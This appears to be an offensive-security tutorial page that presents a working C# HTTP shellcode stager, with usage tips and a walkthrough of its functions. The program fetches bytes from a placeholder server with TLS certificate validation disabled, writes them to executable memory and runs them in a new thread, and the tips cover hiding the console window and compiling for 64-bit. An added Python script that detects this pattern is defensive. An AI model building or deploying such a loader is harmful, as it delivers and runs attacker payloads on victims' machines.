Stager HTTP C#

Code

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
using System.Net;

namespace stagerHttp
{
    class Program
    {
        public static void Main(String[] args)
        {
            byte[] shellcode = Download("http://<ip-shellcode-server>:<port>/<shellcode-filename>");
            Execute(shellcode);

            return;
        }

        private static byte[] Download(string url)
        {
            ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;

            System.Net.WebClient client = new System.Net.WebClient();
            byte[] shellcode = client.DownloadData(url);

            return shellcode;
        }


        [DllImport("kernel32")]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

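        private static void Execute(byte[] shellcode)
        {
            // 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE
            IntPtr addr = VirtualAlloc(IntPtr.Zero, (UInt32)shellcode.Length, 0x1000, 0x40);
            // Copy the downloaded bytes into the allocated region
            Marshal.Copy(shellcode, 0, (IntPtr)(addr), shellcode.Length);

            IntPtr hThread = IntPtr.Zero;
            IntPtr threadId = IntPtr.Zero;
            // Start a thread whose entry point is the start of the region
            hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, threadId);

            // 0xFFFFFFFF = INFINITE: block until the thread exits
            WaitForSingleObject(hThread, 0xFFFFFFFF);

            return;
        }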
    }
}

Initial configuration

To hide the console window, select this field:

To compile for 64-bit:

Explanation

Main function

In this block we store what the Download() function returns in a variable and then execute it.

public static void Main(String[] args)
{
    byte[] shellcode = Download("http://<ip-shellcode-server>:<port>/<shellcode-filename>");
    Execute(shellcode);

    return;
}

Download function

The first line of this function makes the shellcode download ignore the certificate errors produced by HTTPS. The code could work without it, but it can be useful in other situations.

We then use the DownloadData() method to download, as bytes, the content at the URL we pass in, and return it.

private static byte[] Download(string url)
{
    ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;

    System.Net.WebClient client = new System.Net.WebClient();
    byte[] shellcode = client.DownloadData(url);

    return shellcode;
}
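Seen from the detection side, the calls explained above form a recognisable chain: bytes fetched into memory, an executable allocation, and a thread started on it. The following triage script is an added example, not part of the original page; the `triage` function, the indicator names, the weights and the threshold are assumptions of this example, and it works on C# source or decompiled text.

```python
import re

# Indicators drawn from the listing on this page. The weights and the
# threshold are assumptions of this example, not calibrated values.
INDICATORS = {
    "tls_validation_disabled": (r"ServerCertificateValidationCallback\s*\+?=[^;]*=>\s*true", 2),
    "download_to_memory": (r"\.DownloadData\s*\(", 1),
    "rwx_allocation": (r"VirtualAlloc\s*\([^;]*(0x40|PAGE_EXECUTE_READWRITE)\s*\)", 3),
    "copy_to_unmanaged": (r"Marshal\.Copy\s*\(", 1),
    "thread_from_pointer": (r"CreateThread\s*\(", 2),
}
# The chain that makes the sample a stager: fetch bytes, place them in
# executable memory, start a thread on that memory.
CHAIN = {"download_to_memory", "rwx_allocation", "thread_from_pointer"}


def triage(source: str) -> dict:
    """Return matched indicators, a weighted score and a verdict for C# source text."""
    hits = sorted(name for name, (pattern, _) in INDICATORS.items()
                  if re.search(pattern, source))
    score = sum(INDICATORS[name][1] for name in hits)
    if CHAIN.issubset(hits):
        verdict = "download-and-execute"
    elif score >= 2:
        verdict = "review"
    else:
        verdict = "clean"
    return {"hits": hits, "score": score, "verdict": verdict}


# Constructed inputs: the first condenses the calls from the listing above,
# the second is an ordinary downloader that only disables TLS validation.
STAGER_LIKE = """
ServicePointManager.ServerCertificateValidationCallback += (s, c, ch, e) => true;
byte[] buf = new System.Net.WebClient().DownloadData(url);
IntPtr addr = VirtualAlloc(IntPtr.Zero, (UInt32)buf.Length, 0x1000, 0x40);
Marshal.Copy(buf, 0, addr, buf.Length);
IntPtr h = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
"""
DOWNLOADER_ONLY = """
ServicePointManager.ServerCertificateValidationCallback += (s, c, ch, e) => true;
new System.Net.WebClient().DownloadFile(url, "report.pdf");
"""

if __name__ == "__main__":
    for label, text in (("stager-like", STAGER_LIKE), ("downloader", DOWNLOADER_ONLY)):
        print(label, triage(text))
```

The second sample is rated only "review": disabling certificate validation is worth a look on its own, but without the allocation and thread calls it is not the download-and-execute chain.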

ServicePointManager.ServerCertificateValidationCallback Property (System.Net), Microsoft Learn